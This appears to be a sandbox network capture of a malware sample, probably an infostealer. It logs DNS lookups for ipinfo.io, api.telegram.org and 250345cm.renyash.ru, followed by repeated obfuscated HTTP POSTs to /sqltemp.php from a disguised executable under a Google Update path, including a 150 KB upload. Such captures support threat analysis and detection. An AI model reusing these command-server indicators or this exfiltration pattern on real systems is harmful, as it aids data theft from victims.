| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jan 1, 2025 16:02:08.424844027 CET | 65386 | 53 | 192.168.2.6 | 1.1.1.1 |
| Jan 1, 2025 16:02:08.431603909 CET | 53 | 65386 | 1.1.1.1 | 192.168.2.6 |
| Jan 1, 2025 16:02:09.912743092 CET | 50356 | 53 | 192.168.2.6 | 1.1.1.1 |
| Jan 1, 2025 16:02:09.920877934 CET | 53 | 50356 | 1.1.1.1 | 192.168.2.6 |
| Jan 1, 2025 16:02:15.374460936 CET | 56859 | 53 | 192.168.2.6 | 1.1.1.1 |
| Jan 1, 2025 16:02:15.383860111 CET | 53 | 56859 | 1.1.1.1 | 192.168.2.6 |
| Jan 1, 2025 16:02:20.414805889 CET | 53 | 55611 | 1.1.1.1 | 192.168.2.6 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 1, 2025 16:02:08.424844027 CET | 192.168.2.6 | 1.1.1.1 | 0x22cb | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false |
| Jan 1, 2025 16:02:09.912743092 CET | 192.168.2.6 | 1.1.1.1 | 0x77bb | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false |
| Jan 1, 2025 16:02:15.374460936 CET | 192.168.2.6 | 1.1.1.1 | 0xbcff | Standard query (0) | 250345cm.renyash.ru | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 1, 2025 16:02:08.431603909 CET | 1.1.1.1 | 192.168.2.6 | 0x22cb | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false |
| Jan 1, 2025 16:02:09.920877934 CET | 1.1.1.1 | 192.168.2.6 | 0x77bb | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
| Jan 1, 2025 16:02:15.383860111 CET | 1.1.1.1 | 192.168.2.6 | 0xbcff | No error (0) | 250345cm.renyash.ru | | 104.21.38.84 | A (IP address) | IN (0x0001) | false |
| Jan 1, 2025 16:02:15.383860111 CET | 1.1.1.1 | 192.168.2.6 | 0xbcff | No error (0) | 250345cm.renyash.ru | | 172.67.220.198 | A (IP address) | IN (0x0001) | false |

                                                                                                                  • ipinfo.io
                                                                                                                  • api.telegram.org
                                                                                                                  • 250345cm.renyash.ru

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49735 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:15.394190073 CET | 301 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 344
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 16:02:15.855865002 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:16.139549017 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UigMEW5PZkRsqhYjVW6BRnLbVbXa1b%2BMsgcj%2BXyOTDYQiHqos34p%2FN4fncEHNFhAW74sspKJ5P5MIR7bdA3jQwictnmwVpBREfnnEdrKO1ojvAV1gMM416%2FkoUCqLUxtAFnSVQa4"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363accb7c0f84-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9368&min_rtt=1533&rtt_var=16246&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=22734&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 1, 2025 16:02:16.171900988 CET | 277 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 384
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:02:16.269342899 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:16.533253908 CET | 963 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TXtPUE7IHcn6IFo1J%2FO4gIcAHHE8HJ8eX60hWEmf2q6nP8wa1GKFg1fCvweGb6Uk53%2FlEZmbSHXRQOdQ5LAbBzasm6nKA7Kxs4S0Tnl7xpuaaHvo%2FY7X7JtCu%2FHF8bajOhF%2BtzLt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363af6f0e0f84-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=12537&min_rtt=1471&rtt_var=18910&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2206&recv_bytes=1306&delivery_rate=2889182&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.6 | 49741 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 16:02:16.426666021 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
Jan 1, 2025 16:02:16.872229099 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 16:02:17.139561892 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZ1AJurBiJOcVEI4%2BeG3TxKyQdwjCyWIej78skGf1wwQM4VxcEUKNSnyqqrgQCqf3bvri1ziF9jdUG%2BBvHOIYH4axmlYR%2FgDMZBELtX4C%2Fn9A62m6eS5WlK9%2Fd7F6S4dSozlyTkv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363b32ee243b7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2874&min_rtt=2433&rtt_var=1795&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1398&delivery_rate=244843&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  2 | 192.168.2.6 | 49745 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:16.589689970 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1860
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:16.938364029 CET | 1860 | OUT | Data Raw: 53 50 5f 57 54 5d 54 55 58 56 52 59 56 5a 59 52 5b 58 54 59 55 59 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_WT]TUXVRYVZYR[XTYUYP]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.35X#/_0(/99S7,**'S>71+<:%?4:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:17.054145098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:17.313070059 CET | 959 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ub79c24wHtrUitEnRmbjSmzon0h8%2Fs9J%2Bdo74%2BoIjhaqEY2BNO2EaO3bFjypINoHrjKyLPvySFTVixvpVktKkGtvxruCWmOuNrPc8eah%2Bn8zZsifVZ2WxVHoo%2BwTXJ4C8FOs%2FrJR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363b44baa42d3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5007&min_rtt=2397&rtt_var=6119&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2138&delivery_rate=62717&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 51 2a 2d 25 09 26 0b 38 5b 2b 2e 3b 1f 26 2e 03 01 3f 06 04 14 26 2d 3c 01 2a 07 0a 02 35 2f 31 5e 32 38 20 59 20 5b 37 13 27 0e 2b 59 05 1c 20 44 22 3f 0d 00 2a 2d 2c 07 32 01 31 11 26 2e 2c 16 3f 38 3c 1f 37 2b 3c 01 27 03 3c 13 29 04 20 1d 33 02 2b 14 39 06 2d 53 27 3a 2c 54 00 11 25 08 24 08 3b 05 20 19 02 59 35 31 29 1d 24 37 2a 53 25 12 2c 0b 23 00 21 05 25 1c 23 12 21 0a 22 12 25 2b 32 04 20 2d 28 0b 2a 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Q*-%&8[+.;&.?&-<*5/1^28 Y [7'+Y D"?*-,21&.,?8<7+<'<) 3+9-S':,T%$; Y51)$7*S%,#!%#!"%+2 -(*.%S -H?WS0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  3 | 192.168.2.6 | 49751 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:17.282624960 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:17.641423941 CET | 1120 | OUT | Data Raw: 56 50 5a 51 54 50 51 51 58 56 52 59 56 59 59 52 5b 52 54 5f 55 5f 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VPZQTPQQXVRYVYYR[RT_U_P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$&7?3>(/9"# [?)*-<41?]*8%E$??R9*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:17.726901054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:18.011533022 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8D%2BFVAkIhNhNIkwucIHob4n6WFR5ICTR0mm8Ycq7T2SaNLINW7XRJjqEyAm7%2BRPNT7PqPS0O9GNmi%2FMmUvwh0KAoWw0dWEuKOzES7zww6qya2VaQwvicztuJ6by2ulnuNIM4cC2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363b88f6b433e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2547&min_rtt=1760&rtt_var=2235&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1398&delivery_rate=181074&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  4 | 192.168.2.6 | 49761 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:18.207595110 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:18.565045118 CET | 1120 | OUT | Data Raw: 53 50 5f 53 51 5f 54 55 58 56 52 59 56 59 59 54 5b 5c 54 59 55 54 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_SQ_TUXVRYVYYT[\TYUTPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$>4Y=3>;C8: =8[(9R);72?;*17W,*&Y.,Y--
                                                                                                                  Jan 1, 2025 16:02:18.632294893 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:18.920722961 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2F2Rdb%2FWqlHPRbfPz58oaDJyItO%2FQqL27OVkMYRNo0SykFXmfNAK9obpS4J%2B2N5flvAelIaHnhb%2BkdhJInyK8Sv90y2xJ%2FAYH6CkXRtmH8Lpck%2F1Uj%2FcU%2B7OK4K9kYumraXHyAHQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363be28b44411-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5230&min_rtt=2160&rtt_var=6951&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1398&delivery_rate=54632&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  5 | 192.168.2.6 | 49771 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:19.109544039 CET | 278 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:19.467936039 CET | 1124 | OUT | Data Raw: 56 5e 5a 56 51 5c 54 54 58 56 52 59 56 5c 59 51 5b 5d 54 5d 55 58 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V^ZVQ\TTXVRYV\YQ[]T]UXP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'," ,=$>4,*%U#*);*#"0?;.1/;R9*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:19.553513050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:19.766470909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:19.820770979 CET | 817 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L6bFR4lcm%2F1%2FnFQWXz%2FcplJLw%2FKx5MNctkbc5nfhslf6KcST3JcWvNsHCvPZ77ze4XvzQls%2Bl3OxDY7epA30LGB1DTDx7N%2Bi%2BcEt93hhyLRHEj%2B%2F6jYvtEf3xWcziqyStwFNvJbo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363c3ed95426b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2457&min_rtt=1688&rtt_var=2172&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=186129&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  6 | 192.168.2.6 | 49778 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:20.024027109 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  7 | 192.168.2.6 | 49780 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:20.250724077 CET | 304 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 150660
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:20.694576025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:21.665632010 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k7ln8QuEZdDEwIIxmN9790YAF6scfv0QKkDwQ1ecAW7LG8lJQiq7i9qIfhYhB%2Br2MO3IVTTljvhJrJN9Z1EQpXEaOfzGZhbvHex1ivpw0uU4XFLjrH1GFEoXVcqAcR8zz%2FPcYDj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363cb094e42b0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2251&min_rtt=1758&rtt_var=1645&sent=53&recv=156&lost=0&retrans=0&sent_bytes=25&recv_bytes=150964&delivery_rate=256050&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  8 | 192.168.2.6 | 62429 | 104.21.38.84 | 80 | 7048 | C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 16:02:20.450995922 CET | 302 | OUT | POST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:20.797820091 CET | 1124 | OUT | Data Raw: 56 51 5f 50 51 5c 54 57 58 56 52 59 56 58 59 5e 5b 5d 54 5a 55 5a 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_PQ\TWXVRYVXY^[]TZUZPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3?6#"%-',& 0[+:$=-' 23Y<;:%?S.&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:02:20.895581961 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:21.156426907 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k%2FTtCHQhsM2UqzXlYkXfp%2BNFNdrHuqr86XvGPAgXljlhQB%2Bh7x2MFPAkAOc6WGgzLFNO3WD5Grp9VKiwRRfDjdzIE8qOGOTP63h3kVjPCDdihg4x1Od0ar97yfYkCrQOPgQ0B1o"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb363cc58a24246-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4047&min_rtt=1614&rtt_var=5472&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=69253&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
